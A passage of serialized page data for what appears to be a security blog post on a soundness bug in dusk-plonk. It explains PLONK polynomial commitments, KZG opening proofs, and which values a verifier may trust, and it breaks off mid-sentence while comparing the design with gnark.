",{"type":25,"tag":82,"props":147732,"children":147734},{"className":147733},[212,4702],[147735],{"type":25,"tag":216,"props":147736,"children":147738},{"className":147737},[224],[147739],{"type":25,"tag":216,"props":147740,"children":147742},{"className":147741,"ariaHidden":230},[229],[147743],{"type":25,"tag":216,"props":147744,"children":147746},{"className":147745},[235],[147747,147751,147756,147761,147766],{"type":25,"tag":216,"props":147748,"children":147750},{"className":147749,"style":5513},[240],[],{"type":25,"tag":216,"props":147752,"children":147754},{"className":147753,"style":2152},[246,2151],[147755],{"type":31,"value":177},{"type":25,"tag":216,"props":147757,"children":147759},{"className":147758},[287],[147760],{"type":31,"value":1850},{"type":25,"tag":216,"props":147762,"children":147764},{"className":147763},[246,2151],[147765],{"type":31,"value":2541},{"type":25,"tag":216,"props":147767,"children":147769},{"className":147768},[427],[147770],{"type":31,"value":1888},{"type":31,"value":25464},{"type":25,"tag":82,"props":147773,"children":147775},{"className":147774},[212,4702],[147776],{"type":25,"tag":216,"props":147777,"children":147779},{"className":147778},[224],[147780],{"type":25,"tag":216,"props":147781,"children":147783},{"className":147782,"ariaHidden":230},[229],[147784,147825,147866],{"type":25,"tag":216,"props":147785,"children":147787},{"className":147786},[235],[147788,147792,147797,147802,147807,147812,147816,147821],{"type":25,"tag":216,"props":147789,"children":147791},{"className":147790,"style":5513},[240],[],{"type":25,"tag":216,"props":147793,"children":147795},{"className":147794,"style":2152},[246,2151],[147796],{"type":31,"value":5947},{"type":25,"tag":216,"props":147798,"children":147800},{"className":147799},[287],[147801],{"type":31,"value":1850},{"type":25,"tag":216,"props":147803,"children":147805},{"className":147804},[246,2151],[147806],{"type":31,"value":2541},{"type":25,"tag":216,"props":147808,"children":147810},{"className":147809},[427],[147811],{"type":31,"value":1888},{"type":25,"tag":216,"props":147813,"children":147815},{"className":147814,"style":258},[257],[],{"type":25,"tag":216,"props":147817,"children":147819},{"className":147818},[263],[147820],{"type":31,"value":266},{"type":25,"tag":216,"props":147822,"children":147824},{"className":147823,"style":258},[257],[],{"type":25,"tag":216,"props":147826,"children":147828},{"className":147827},[235],[147829,147833,147838,147843,147848,147853,147857,147862],{"type":25,"tag":216,"props":147830,"children":147832},{"className":147831,"style":5513},[240],[],{"type":25,"tag":216,"props":147834,"children":147836},{"className":147835,"style":2152},[246,2151],[147837],{"type":31,"value":177},{"type":25,"tag":216,"props":147839,"children":147841},{"className":147840},[287],[147842],{"type":31,"value":1850},{"type":25,"tag":216,"props":147844,"children":147846},{"className":147845},[246,2151],[147847],{"type":31,"value":2541},{"type":25,"tag":216,"props":147849,"children":147851},{"className":147850},[427],[147852],{"type":31,"value":1888},{"type":25,"tag":216,"props":147854,"children":147856},{"className":147855,"style":335},[257],[],{"type":25,"tag":216,"props":147858,"children":147860},{"className":147859},[340],[147861],{"type":31,"value":343},{"type":25,"tag":216,"props":147863,"children":147865},{"className":147864,"style":335},[257],[],{"type":25,"tag":216,"props":147867,"children":147869},{"className":147868},[235],[147870,147874,147879,147884,147889],{"type":25,"tag":216,"props":147871,"children":147873},{"className":147872,"style":5513},[240],[],{"type":25,"tag":216,"props":147875,"children":147877},{"className":147876,"style":26065},[246,2151],[147878],{"type":31,"value":147540},{"type":25,"tag":216,"props":147880,"children":147882},{"className":147881},[287],[147883],{"type":31,"value":1850},{"type":25,"tag":216,"props":147885,"children":147887},{"className":147886},[246,2151],[147888],{"type":31,"value":2541},{"type":25,"tag":216,"props":147890,"children":147892},{"className":147891},[427],[147893],{"type":31,"value":1888},{"type":31,"value":179},{"type":25,"tag":38,"props":147896,"children":147897},{},[147898],{"type":25,"tag":6467,"props":147899,"children":147902},{"alt":147900,"src":147901},"master_equation","/posts/dusk-commitment-issues/master_equation.svg",[],{"type":25,"tag":606,"props":147904,"children":147906},{"id":147905},"polynomial-commitments-and-opening-proofs",[147907],{"type":31,"value":147908},"Polynomial commitments and opening proofs",{"type":25,"tag":38,"props":147910,"children":147911},{},[147912,147914,147919,147921,147926],{"type":31,"value":147913},"To keep the proof short, the prover doesn't send polynomials directly. Instead, it sends ",{"type":25,"tag":64,"props":147915,"children":147916},{},[147917],{"type":31,"value":147918},"commitments",{"type":31,"value":147920},", short cryptographic fingerprints of each polynomial (using e.g. KZG commitments). When the verifier needs the value of a committed polynomial at a specific point, the prover provides the value along with an ",{"type":25,"tag":64,"props":147922,"children":147923},{},[147924],{"type":31,"value":147925},"opening proof",{"type":31,"value":147927}," that the claimed value is consistent with the earlier commitment.",{"type":25,"tag":38,"props":147929,"children":147930},{},[147931],{"type":31,"value":147932},"A committed polynomial evaluation is therefore cryptographically bound, and the prover cannot lie about the value without being caught.",{"type":25,"tag":606,"props":147934,"children":147936},{"id":147935},"reducing-to-a-single-random-point",[147937],{"type":31,"value":147938},"Reducing to a single random point",{"type":25,"tag":38,"props":147940,"children":147941},{},[147942,147944,147984,147986,148011,148013,148135,148137,148162],{"type":31,"value":147943},"After the prover commits to all polynomials, including ",{"type":25,"tag":82,"props":147945,"children":147947},{"className":147946},[212,4702],[147948],{"type":25,"tag":216,"props":147949,"children":147951},{"className":147950},[224],[147952],{"type":25,"tag":216,"props":147953,"children":147955},{"className":147954,"ariaHidden":230},[229],[147956],{"type":25,"tag":216,"props":147957,"children":147959},{"className":147958},[235],[147960,147964,147969,147974,147979],{"type":25,"tag":216,"props":147961,"children":147963},{"className":147962,"style":5513},[240],[],{"type":25,"tag":216,"props":147965,"children":147967},{"className":147966,"style":2152},[246,2151],[147968],{"type":31,"value":177},{"type":25,"tag":216,"props":147970,"children":147972},{"className":147971},[287],[147973],{"type":31,"value":1850},{"type":25,"tag":216,"props":147975,"children":147977},{"className":147976},[246,2151],[147978],{"type":31,"value":2541},{"type":25,"tag":216,"props":147980,"children":147982},{"className":147981},[427],[147983],{"type":31,"value":1888},{"type":31,"value":147985},", the verifier picks a random challenge point ",{"type":25,"tag":82,"props":147987,"children":147989},{"className":147988},[212,4702],[147990],{"type":25,"tag":216,"props":147991,"children":147993},{"className":147992},[224],[147994],{"type":25,"tag":216,"props":147995,"children":147997},{"className":147996,"ariaHidden":230},[229],[147998],{"type":25,"tag":216,"props":147999,"children":148001},{"className":148000},[235],[148002,148006],{"type":25,"tag":216,"props":148003,"children":148005},{"className":148004,"style":6315},[240],[],{"type":25,"tag":216,"props":148007,"children":148009},{"className":148008,"style":117544},[246,2151],[148010],{"type":31,"value":117547},{"type":31,"value":148012}," (derived via the Fiat-Shamir heuristic from the transcript) and checks ",{"type":25,"tag":82,"props":148014,"children":148016},{"className":148015},[212,4702],[148017],{"type":25,"tag":216,"props":148018,"children":148020},{"className":148019},[224],[148021],{"type":25,"tag":216,"props":148022,"children":148024},{"className":148023,"ariaHidden":230},[229],[148025,148066,148107],{"type":25,"tag":216,"props":148026,"children":148028},{"className":148027},[235],[148029,148033,148038,148043,148048,148053,148057,148062],{"type":25,"tag":216,"props":148030,"children":148032},{"className":148031,"style":5513},[240],[],{"type":25,"tag":216,"props":148034,"children":148036},{"className":148035,"style":2152},[246,2151],[148037],{"type":31,"value":5947},{"type":25,"tag":216,"props":148039,"children":148041},{"className":148040},[287],[148042],{"type":31,"value":1850},{"type":25,"tag":216,"props":148044,"children":148046},{"className":148045,"style":117544},[246,2151],[148047],{"type":31,"value":117547},{"type":25,"tag":216,"props":148049,"children":148051},{"className":148050},[427],[148052],{"type":31,"value":1888},{"type":25,"tag":216,"props":148054,"children":148056},{"className":148055,"style":258},[257],[],{"type":25,"tag":216,"props":148058,"children":148060},{"className":148059},[263],[148061],{"type":31,"value":266},{"type":25,"tag":216,"props":148063,"children":148065},{"className":148064,"style":258},[257],[],{"type":25,"tag":216,"props":148067,"children":148069},{"className":148068},[235],[148070,148074,148079,148084,148089,148094,148098,148103],{"type":25,"tag":216,"props":148071,"children":148073},{"className":148072,"style":5513},[240],[],{"type":25,"tag":216,"props":148075,"children":148077},{"className":148076,"style":2152},[246,2151],[148078],{"type":31,"value":177},{"type":25,"tag":216,"props":148080,"children":148082},{"className":148081},[287],[148083],{"type":31,"value":1850},{"type":25,"tag":216,"props":148085,"children":148087},{"className":148086,"style":117544},[246,2151],[148088],{"type":31,"value":117547},{"type":25,"tag":216,"props":148090,"children":148092},{"className":148091},[427],[148093],{"type":31,"value":1888},{"type":25,"tag":216,"props":148095,"children":148097},{"className":148096,"style":335},[257],[],{"type":25,"tag":216,"props":148099,"children":148101},{"className":148100},[340],[148102],{"type":31,"value":343},{"type":25,"tag":216,"props":148104,"children":148106},{"className":148105,"style":335},[257],[],{"type":25,"tag":216,"props":148108,"children":148110},{"className":148109},[235],[148111,148115,148120,148125,148130],{"type":25,"tag":216,"props":148112,"children":148114},{"className":148113,"style":5513},[240],[],{"type":25,"tag":216,"props":148116,"children":148118},{"className":148117,"style":26065},[246,2151],[148119],{"type":31,"value":147540},{"type":25,"tag":216,"props":148121,"children":148123},{"className":148122},[287],[148124],{"type":31,"value":1850},{"type":25,"tag":216,"props":148126,"children":148128},{"className":148127,"style":117544},[246,2151],[148129],{"type":31,"value":117547},{"type":25,"tag":216,"props":148131,"children":148133},{"className":148132},[427],[148134],{"type":31,"value":1888},{"type":31,"value":148136}," at that single point. By the Schwartz-Zippel lemma, if this holds at a random ",{"type":25,"tag":82,"props":148138,"children":148140},{"className":148139},[212,4702],[148141],{"type":25,"tag":216,"props":148142,"children":148144},{"className":148143},[224],[148145],{"type":25,"tag":216,"props":148146,"children":148148},{"className":148147,"ariaHidden":230},[229],[148149],{"type":25,"tag":216,"props":148150,"children":148152},{"className":148151},[235],[148153,148157],{"type":25,"tag":216,"props":148154,"children":148156},{"className":148155,"style":6315},[240],[],{"type":25,"tag":216,"props":148158,"children":148160},{"className":148159,"style":117544},[246,2151],[148161],{"type":31,"value":117547},{"type":31,"value":148163}," then the full polynomial identity holds with overwhelming probability, so the verifier checks the entire multi-million-row circuit in constant time.",{"type":25,"tag":38,"props":148165,"children":148166},{},[148167,148169,148194,148196,148201],{"type":31,"value":148168},"In textbook PLONK the selector polynomials are part of the fixed circuit description, but in practice implementations commit to them during preprocessing and place those commitments in the verifier key. When the verifier later needs their values at ",{"type":25,"tag":82,"props":148170,"children":148172},{"className":148171},[212,4702],[148173],{"type":25,"tag":216,"props":148174,"children":148176},{"className":148175},[224],[148177],{"type":25,"tag":216,"props":148178,"children":148180},{"className":148179,"ariaHidden":230},[229],[148181],{"type":25,"tag":216,"props":148182,"children":148184},{"className":148183},[235],[148185,148189],{"type":25,"tag":216,"props":148186,"children":148188},{"className":148187,"style":6315},[240],[],{"type":25,"tag":216,"props":148190,"children":148192},{"className":148191,"style":117544},[246,2151],[148193],{"type":31,"value":117547},{"type":31,"value":148195},", the prover supplies ",{"type":25,"tag":64,"props":148197,"children":148198},{},[148199],{"type":31,"value":148200},"evaluation claims",{"type":31,"value":148202}," that must be checked against those commitments with opening proofs.",{"type":25,"tag":38,"props":148204,"children":148205},{},[148206,148208,148212],{"type":31,"value":148207},"The security argument depends on a chain: commitments lock the prover into polynomials ",{"type":25,"tag":64,"props":148209,"children":148210},{},[148211],{"type":31,"value":108549},{"type":31,"value":148213}," challenges are derived, and opening proofs ensure the evaluations are consistent with those commitments. Breaking any single link in this chain collapses soundness entirely.",{"type":25,"tag":606,"props":148215,"children":148217},{"id":148216},"what-the-verifier-is-actually-allowed-to-trust",[148218],{"type":31,"value":148219},"What the verifier is actually allowed to trust",{"type":25,"tag":38,"props":148221,"children":148222},{},[148223,148225,148230],{"type":31,"value":148224},"For this bug, one invariant matters more than the rest: ",{"type":25,"tag":9273,"props":148226,"children":148227},{},[148228],{"type":31,"value":148229},"every scalar that enters the final verifier equation must be either locally computed by the verifier, or cryptographically tied to an earlier commitment",{"type":31,"value":179},{"type":25,"tag":38,"props":148232,"children":148233},{},[148234,148236,148328,148329,148421,148423,148448,148450,148490,148491,148531,148532,148625,148626,148672,148674,148761,148762,148849,148850,148937],{"type":31,"value":148235},"In practice, values entering the verifier equation fall into three buckets. The verifier computes some values locally from public data (",{"type":25,"tag":82,"props":148237,"children":148239},{"className":148238},[212,4702],[148240],{"type":25,"tag":216,"props":148241,"children":148243},{"className":148242},[224],[148244],{"type":25,"tag":216,"props":148245,"children":148247},{"className":148246,"ariaHidden":230},[229],[148248],{"type":25,"tag":216,"props":148249,"children":148251},{"className":148250},[235],[148252,148256,148313,148318,148323],{"type":25,"tag":216,"props":148253,"children":148255},{"className":148254,"style":5513},[240],[],{"type":25,"tag":216,"props":148257,"children":148259},{"className":148258},[246],[148260,148265],{"type":25,"tag":216,"props":148261,"children":148263},{"className":148262,"style":26065},[246,2151],[148264],{"type":31,"value":147540},{"type":25,"tag":216,"props":148266,"children":148268},{"className":148267},[2159],[148269],{"type":25,"tag":216,"props":148270,"children":148272},{"className":148271},[298,299],[148273,148302],{"type":25,"tag":216,"props":148274,"children":148276},{"className":148275},[304],[148277,148297],{"type":25,"tag":216,"props":148278,"children":148280},{"className":148279,"style":2698},[309],[148281],{"type":25,"tag":216,"props":148282,"children":148283},{"style":120232},[148284,148288],{"type":25,"tag":216,"props":148285,"children":148287},{"className":148286,"style":2181},[319],[],{"type":25,"tag":216,"props":148289,"children":148291},{"className":148290},[2186,2187,2188,2189],[148292],{"type":25,"tag":216,"props":148293,"children":148295},{"className":148294,"style":2679},[246,2151,2189],[148296],{"type":31,"value":2682},{"type":25,"tag":216,"props":148298,"children":148300},{"className":148299},[408],[148301],{"type":31,"value":411},{"type":25,"tag":216,"props":148303,"children":148305},{"className":148304},[304],[148306],{"type":25,"tag":216,"props":148307,"children":148309},{"className":148308,"style":2209},[309],[148310],{"type":25,"tag":216,"props":148311,"children":148312},{},[],{"type":25,"tag":216,"props":148314,"children":148316},{"className":148315},[287],[148317],{"type":31,"value":1850},{"type":25,"tag":216,"props":148319,"children":148321},{"className":148320,"style":117544},[246,2151],[148322],{"type":31,"value":117547},{"type":25,"tag":216,"props":148324,"children":148326},{"className":148325},[427],[148327],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":148330,"children":148332},{"className":148331},[212,4702],[148333],{"type":25,"tag":216,"props":148334,"children":148336},{"className":148335},[224],[148337],{"type":25,"tag":216,"props":148338,"children":148340},{"className":148339,"ariaHidden":230},[229],[148341],{"type":25,"tag":216,"props":148342,"children":148344},{"className":148343},[235],[148345,148349,148406,148411,148416],{"type":25,"tag":216,"props":148346,"children":148348},{"className":148347,"style":5513},[240],[],{"type":25,"tag":216,"props":148350,"children":148352},{"className":148351},[246],[148353,148358],{"type":25,"tag":216,"props":148354,"children":148356},{"className":148355},[246,2151],[148357],{"type":31,"value":121947},{"type":25,"tag":216,"props":148359,"children":148361},{"className":148360},[2159],[148362],{"type":25,"tag":216,"props":148363,"children":148365},{"className":148364},[298,299],[148366,148395],{"type":25,"tag":216,"props":148367,"children":148369},{"className":148368},[304],[148370,148390],{"type":25,"tag":216,"props":148371,"children":148373},{"className":148372,"style":97069},[309],[148374],{"type":25,"tag":216,"props":148375,"children":148376},{"style":2274},[148377,148381],{"type":25,"tag":216,"props":148378,"children":148380},{"className":148379,"style":2181},[319],[],{"type":25,"tag":216,"props":148382,"children":148384},{"className":148383},[2186,2187,2188,2189],[148385],{"type":25,"tag":216,"props":148386,"children":148388},{"className":148387},[246,2189],[148389],{"type":31,"value":184},{"type":25,"tag":216,"props":148391,"children":148393},{"className":148392},[408],[148394],{"type":31,"value":411},{"type":25,"tag":216,"props":148396,"children":148398},{"className":148397},[304],[148399],{"type":25,"tag":216,"props":148400,"children":148402},{"className":148401,"style":2209},[309],[148403],{"type":25,"tag":216,"props":148404,"children":148405},{},[],{"type":25,"tag":216,"props":148407,"children":148409},{"className":148408},[287],[148410],{"type":31,"value":1850},{"type":25,"tag":216,"props":148412,"children":148414},{"className":148413,"style":117544},[246,2151],[148415],{"type":31,"value":117547},{"type":25,"tag":216,"props":148417,"children":148419},{"className":148418},[427],[148420],{"type":31,"value":1888},{"type":31,"value":148422},", the public-input polynomial at ",{"type":25,"tag":82,"props":148424,"children":148426},{"className":148425},[212,4702],[148427],{"type":25,"tag":216,"props":148428,"children":148430},{"className":148429},[224],[148431],{"type":25,"tag":216,"props":148432,"children":148434},{"className":148433,"ariaHidden":230},[229],[148435],{"type":25,"tag":216,"props":148436,"children":148438},{"className":148437},[235],[148439,148443],{"type":25,"tag":216,"props":148440,"children":148442},{"className":148441,"style":6315},[240],[],{"type":25,"tag":216,"props":148444,"children":148446},{"className":148445,"style":117544},[246,2151],[148447],{"type":31,"value":117547},{"type":31,"value":148449},"), which are safe because the prover never chooses them. Other values are prover-supplied evaluations accompanied by KZG opening proofs (",{"type":25,"tag":82,"props":148451,"children":148453},{"className":148452},[212,4702],[148454],{"type":25,"tag":216,"props":148455,"children":148457},{"className":148456},[224],[148458],{"type":25,"tag":216,"props":148459,"children":148461},{"className":148460,"ariaHidden":230},[229],[148462],{"type":25,"tag":216,"props":148463,"children":148465},{"className":148464},[235],[148466,148470,148475,148480,148485],{"type":25,"tag":216,"props":148467,"children":148469},{"className":148468,"style":5513},[240],[],{"type":25,"tag":216,"props":148471,"children":148473},{"className":148472},[246,2151],[148474],{"type":31,"value":162},{"type":25,"tag":216,"props":148476,"children":148478},{"className":148477},[287],[148479],{"type":31,"value":1850},{"type":25,"tag":216,"props":148481,"children":148483},{"className":148482,"style":117544},[246,2151],[148484],{"type":31,"value":117547},{"type":25,"tag":216,"props":148486,"children":148488},{"className":148487},[427],[148489],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":148492,"children":148494},{"className":148493},[212,4702],[148495],{"type":25,"tag":216,"props":148496,"children":148498},{"className":148497},[224],[148499],{"type":25,"tag":216,"props":148500,"children":148502},{"className":148501,"ariaHidden":230},[229],[148503],{"type":25,"tag":216,"props":148504,"children":148506},{"className":148505},[235],[148507,148511,148516,148521,148526],{"type":25,"tag":216,"props":148508,"children":148510},{"className":148509,"style":5513},[240],[],{"type":25,"tag":216,"props":148512,"children":148514},{"className":148513},[246,2151],[148515],{"type":31,"value":7171},{"type":25,"tag":216,"props":148517,"children":148519},{"className":148518},[287],[148520],{"type":31,"value":1850},{"type":25,"tag":216,"props":148522,"children":148524},{"className":148523,"style":117544},[246,2151],[148525],{"type":31,"value":117547},{"type":25,"tag":216,"props":148527,"children":148529},{"className":148528},[427],[148530],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":148533,"children":148535},{"className":148534},[212,4702],[148536],{"type":25,"tag":216,"props":148537,"children":148539},{"className":148538},[224],[148540],{"type":25,"tag":216,"props":148541,"children":148543},{"className":148542,"ariaHidden":230},[229],[148544],{"type":25,"tag":216,"props":148545,"children":148547},{"className":148546},[235],[148548,148552,148610,148615,148620],{"type":25,"tag":216,"props":148549,"children":148551},{"className":148550,"style":5513},[240],[],{"type":25,"tag":216,"props":148553,"children":148555},{"className":148554},[246],[148556,148562],{"type":25,"tag":216,"props":148557,"children":148559},{"className":148558,"style":2325},[246,2151],[148560],{"type":31,"value":148561},"σ",{"type":25,"tag":216,"props":148563,"children":148565},{"className":148564},[2159],[148566],{"type":25,"tag":216,"props":148567,"children":148569},{"className":148568},[298,299],[148570,148599],{"type":25,"tag":216,"props":148571,"children":148573},{"className":148572},[304],[148574,148594],{"type":25,"tag":216,"props":148575,"children":148577},{"className":148576,"style":97069},[309],[148578],{"type":25,"tag":216,"props":148579,"children":148580},{"style":2347},[148581,148585],{"type":25,"tag":216,"props":148582,"children":148584},{"className":148583,"style":2181},[319],[],{"type":25,"tag":216,"props":148586,"children":148588},{"className":148587},[2186,2187,2188,2189],[148589],{"type":25,"tag":216,"props":148590,"children":148592},{"className":148591},[246,2189],[148593],{"type":31,"value":184},{"type":25,"tag":216,"props":148595,"children":148597},{"className":148596},[408],[148598],{"type":31,"value":411},{"type":25,"tag":216,"props":148600,"children":148602},{"className":148601},[304],[148603],{"type":25,"tag":216,"props":148604,"children":148606},{"className":148605,"style":2209},[309],[148607],{"type":25,"tag":216,"props":148608,"children":148609},{},[],{"type":25,"tag":216,"props":148611,"children":148613},{"className":148612},[287],[148614],{"type":31,"value":1850},{"type":25,"tag":216,"props":148616,"children":148618},{"className":148617,"style":117544},[246,2151],[148619],{"type":31,"value":117547},{"type":25,"tag":216,"props":148621,"children":148623},{"className":148622},[427],[148624],{"type":31,"value":1888},{"type":31,"value":7026},{"type":25,"tag":82,"props":148627,"children":148629},{"className":148628},[212,4702],[148630],{"type":25,"tag":216,"props":148631,"children":148633},{"className":148632},[224],[148634],{"type":25,"tag":216,"props":148635,"children":148637},{"className":148636,"ariaHidden":230},[229],[148638],{"type":25,"tag":216,"props":148639,"children":148641},{"className":148640},[235],[148642,148646,148651,148656,148661,148667],{"type":25,"tag":216,"props":148643,"children":148645},{"className":148644,"style":5513},[240],[],{"type":25,"tag":216,"props":148647,"children":148649},{"className":148648},[246,2151],[148650],{"type":31,"value":162},{"type":25,"tag":216,"props":148652,"children":148654},{"className":148653},[287],[148655],{"type":31,"value":1850},{"type":25,"tag":216,"props":148657,"children":148659},{"className":148658,"style":117544},[246,2151],[148660],{"type":31,"value":117547},{"type":25,"tag":216,"props":148662,"children":148664},{"className":148663,"style":2325},[246,2151],[148665],{"type":31,"value":148666},"ω",{"type":25,"tag":216,"props":148668,"children":148670},{"className":148669},[427],[148671],{"type":31,"value":1888},{"type":31,"value":148673},"), which are safe because the opening binds them to previously committed polynomials. A third category consists of verifier-key commitments used directly in the linearization multiscalar multiplication (",{"type":25,"tag":82,"props":148675,"children":148677},{"className":148676},[212,4702],[148678],{"type":25,"tag":216,"props":148679,"children":148681},{"className":148680},[224],[148682],{"type":25,"tag":216,"props":148683,"children":148685},{"className":148684,"ariaHidden":230},[229],[148686],{"type":25,"tag":216,"props":148687,"children":148689},{"className":148688},[235],[148690,148694,148699,148756],{"type":25,"tag":216,"props":148691,"children":148693},{"className":148692,"style":5513},[240],[],{"type":25,"tag":216,"props":148695,"children":148697},{"className":148696},[287],[148698],{"type":31,"value":7701},{"type":25,"tag":216,"props":148700,"children":148702},{"className":148701},[246],[148703,148708],{"type":25,"tag":216,"props":148704,"children":148706},{"className":148705,"style":2325},[246,2151],[148707],{"type":31,"value":97501},{"type":25,"tag":216,"props":148709,"children":148711},{"className":148710},[2159],[148712],{"type":25,"tag":216,"props":148713,"children":148715},{"className":148714},[298,299],[148716,148745],{"type":25,"tag":216,"props":148717,"children":148719},{"className":148718},[304],[148720,148740],{"type":25,"tag":216,"props":148721,"children":148723},{"className":148722,"style":2698},[309],[148724],{"type":25,"tag":216,"props":148725,"children":148726},{"style":2347},[148727,148731],{"type":25,"tag":216,"props":148728,"children":148730},{"className":148729,"style":2181},[319],[],{"type":25,"tag":216,"props":148732,"children":148734},{"className":148733},[2186,2187,2188,2189],[148735],{"type":25,"tag":216,"props":148736,"children":148738},{"className":148737,"style":2824},[246,2151,2189],[148739],{"type":31,"value":99018},{"type":25,"tag":216,"props":148741,"children":148743},{"className":148742},[408],[148744],{"type":31,"value":411},{"type":25,"tag":216,"props":148746,"children":148748},{"className":148747},[304],[148749],{"type":25,"tag":216,"props":148750,"children":148752},{"className":148751,"style":2209},[309],[148753],{"type":25,"tag":216,"props":148754,"children":148755},{},[],{"type":25,"tag":216,"props":148757,"children":148759},{"className":148758},[427],[148760],{"type":31,"value":19368},{"type":31,"value":7026},{"type":25,"tag":82,"props":148763,"children":148765},{"className":148764},[212,4702],[148766],{"type":25,"tag":216,"props":148767,"children":148769},{"className":148768},[224],[148770],{"type":25,"tag":216,"props":148771,"children":148773},{"className":148772,"ariaHidden":230},[229],[148774],{"type":25,"tag":216,"props":148775,"children":148777},{"className":148776},[235],[148778,148782,148787,148844],{"type":25,"tag":216,"props":148779,"children":148781},{"className":148780,"style":5513},[240],[],{"type":25,"tag":216,"props":148783,"children":148785},{"className":148784},[287],[148786],{"type":31,"value":7701},{"type":25,"tag":216,"props":148788,"children":148790},{"className":148789},[246],[148791,148796],{"type":25,"tag":216,"props":148792,"children":148794},{"className":148793,"style":2325},[246,2151],[148795],{"type":31,"value":97501},{"type":25,"tag":216,"props":148797,"children":148799},{"className":148798},[2159],[148800],{"type":25,"tag":216,"props":148801,"children":148803},{"className":148802},[298,299],[148804,148833],{"type":25,"tag":216,"props":148805,"children":148807},{"className":148806},[304],[148808,148828],{"type":25,"tag":216,"props":148809,"children":148811},{"className":148810,"style":2698},[309],[148812],{"type":25,"tag":216,"props":148813,"children":148814},{"style":2347},[148815,148819],{"type":25,"tag":216,"props":148816,"children":148818},{"className":148817,"style":2181},[319],[],{"type":25,"tag":216,"props":148820,"children":148822},{"className":148821},[2186,2187,2188,2189],[148823],{"type":25,"tag":216,"props":148824,"children":148826},{"className":148825,"style":2752},[246,2151,2189],[148827],{"type":31,"value":119302},{"type":25,"tag":216,"props":148829,"children":148831},{"className":148830},[408],[148832],{"type":31,"value":411},{"type":25,"tag":216,"props":148834,"children":148836},{"className":148835},[304],[148837],{"type":25,"tag":216,"props":148838,"children":148840},{"className":148839,"style":2209},[309],[148841],{"type":25,"tag":216,"props":148842,"children":148843},{},[],{"type":25,"tag":216,"props":148845,"children":148847},{"className":148846},[427],[148848],{"type":31,"value":19368},{"type":31,"value":7026},{"type":25,"tag":82,"props":148851,"children":148853},{"className":148852},[212,4702],[148854],{"type":25,"tag":216,"props":148855,"children":148857},{"className":148856},[224],[148858],{"type":25,"tag":216,"props":148859,"children":148861},{"className":148860,"ariaHidden":230},[229],[148862],{"type":25,"tag":216,"props":148863,"children":148865},{"className":148864},[235],[148866,148870,148875,148932],{"type":25,"tag":216,"props":148867,"children":148869},{"className":148868,"style":5513},[240],[],{"type":25,"tag":216,"props":148871,"children":148873},{"className":148872},[287],[148874],{"type":31,"value":7701},{"type":25,"tag":216,"props":148876,"children":148878},{"className":148877},[246],[148879,148884],{"type":25,"tag":216,"props":148880,"children":148882},{"className":148881,"style":2325},[246,2151],[148883],{"type":31,"value":148561},{"type":25,"tag":216,"props":148885,"children":148887},{"className":148886},[2159],[148888],{"type":25,"tag":216,"props":148889,"children":148891},{"className":148890},[298,299],[148892,148921],{"type":25,"tag":216,"props":148893,"children":148895},{"className":148894},[304],[148896,148916],{"type":25,"tag":216,"props":148897,"children":148899},{"className":148898,"style":97069},[309],[148900],{"type":25,"tag":216,"props":148901,"children":148902},{"style":2347},[148903,148907],{"type":25,"tag":216,"props":148904,"children":148906},{"className":148905,"style":2181},[319],[],{"type":25,"tag":216,"props":148908,"children":148910},{"className":148909},[2186,2187,2188,2189],[148911],{"type":25,"tag":216,"props":148912,"children":148914},{"className":148913},[246,2189],[148915],{"type":31,"value":21486},{"type":25,"tag":216,"props":148917,"children":148919},{"className":148918},[408],[148920],{"type":31,"value":411},{"type":25,"tag":216,"props":148922,"children":148924},{"className":148923},[304],[148925],{"type":25,"tag":216,"props":148926,"children":148928},{"className":148927,"style":2209},[309],[148929],{"type":25,"tag":216,"props":148930,"children":148931},{},[],{"type":25,"tag":216,"props":148933,"children":148935},{"className":148934},[427],[148936],{"type":31,"value":19368},{"type":31,"value":148938},"), which are safe because the verifier never trusts a bare field element for these; it uses the commitment itself.",{"type":25,"tag":38,"props":148940,"children":148941},{},[148942],{"type":31,"value":148943},"Any term that falls outside those three categories is attacker-controlled by construction.",{"type":25,"tag":22753,"props":148945,"children":148946},{},[],{"type":25,"tag":26,"props":148948,"children":148950},{"id":148949},"where-dusk-plonk-differs-from-textbook-plonk",[148951],{"type":31,"value":148952},"Where dusk-plonk differs from textbook PLONK",{"type":25,"tag":38,"props":148954,"children":148955},{},[148956,148965,148967,148972,148974,149004],{"type":25,"tag":162,"props":148957,"children":148959},{"href":145833,"rel":148958},[166],[148960],{"type":25,"tag":82,"props":148961,"children":148963},{"className":148962},[],[148964],{"type":31,"value":145837},{"type":31,"value":148966}," is not a literal transcription of the 2019 PLONK paper. It extends the arithmetic gate with a fourth wire ",{"type":25,"tag":82,"props":148968,"children":148970},{"className":148969},[],[148971],{"type":31,"value":74534},{"type":31,"value":148973},", adds custom widgets for range, logic, and elliptic-curve operations, uses shifted evaluations at ",{"type":25,"tag":82,"props":148975,"children":148977},{"className":148976},[212,4702],[148978],{"type":25,"tag":216,"props":148979,"children":148981},{"className":148980},[224],[148982],{"type":25,"tag":216,"props":148983,"children":148985},{"className":148984,"ariaHidden":230},[229],[148986],{"type":25,"tag":216,"props":148987,"children":148989},{"className":148988},[235],[148990,148994,148999],{"type":25,"tag":216,"props":148991,"children":148993},{"className":148992,"style":6315},[240],[],{"type":25,"tag":216,"props":148995,"children":148997},{"className":148996,"style":117544},[246,2151],[148998],{"type":31,"value":117547},{"type":25,"tag":216,"props":149000,"children":149002},{"className":149001,"style":2325},[246,2151],[149003],{"type":31,"value":148666},{"type":31,"value":149005},", and heavily batches KZG openings. None of that is exotic by modern PLONK standards, but it does make the verifier harder to reason about than the minimal paper presentation.",{"type":25,"tag":38,"props":149007,"children":149008},{},[149009,149011,149016,149017,149022,149024,149030,149032,149039],{"type":31,"value":149010},"The important part for this bug is the boundary between ",{"type":25,"tag":9273,"props":149012,"children":149013},{},[149014],{"type":31,"value":149015},"public circuit data",{"type":31,"value":1307},{"type":25,"tag":9273,"props":149018,"children":149019},{},[149020],{"type":31,"value":149021},"prover claims about that data at the random challenge point",{"type":31,"value":149023},". Parallel implementations avoid this ambiguity by keeping selector polynomials strictly out of the prover's hands. For example, Consensys' gnark (one of the most widely deployed PLONK implementations) never asks the prover for selector evaluations at all. Instead, the verifier incorporates the selector commitments ",{"type":25,"tag":82,"props":149025,"children":149027},{"className":149026},[],[149028],{"type":31,"value":149029},"Ql, Qr, Qm, Qo, Qk",{"type":31,"value":149031}," directly into the 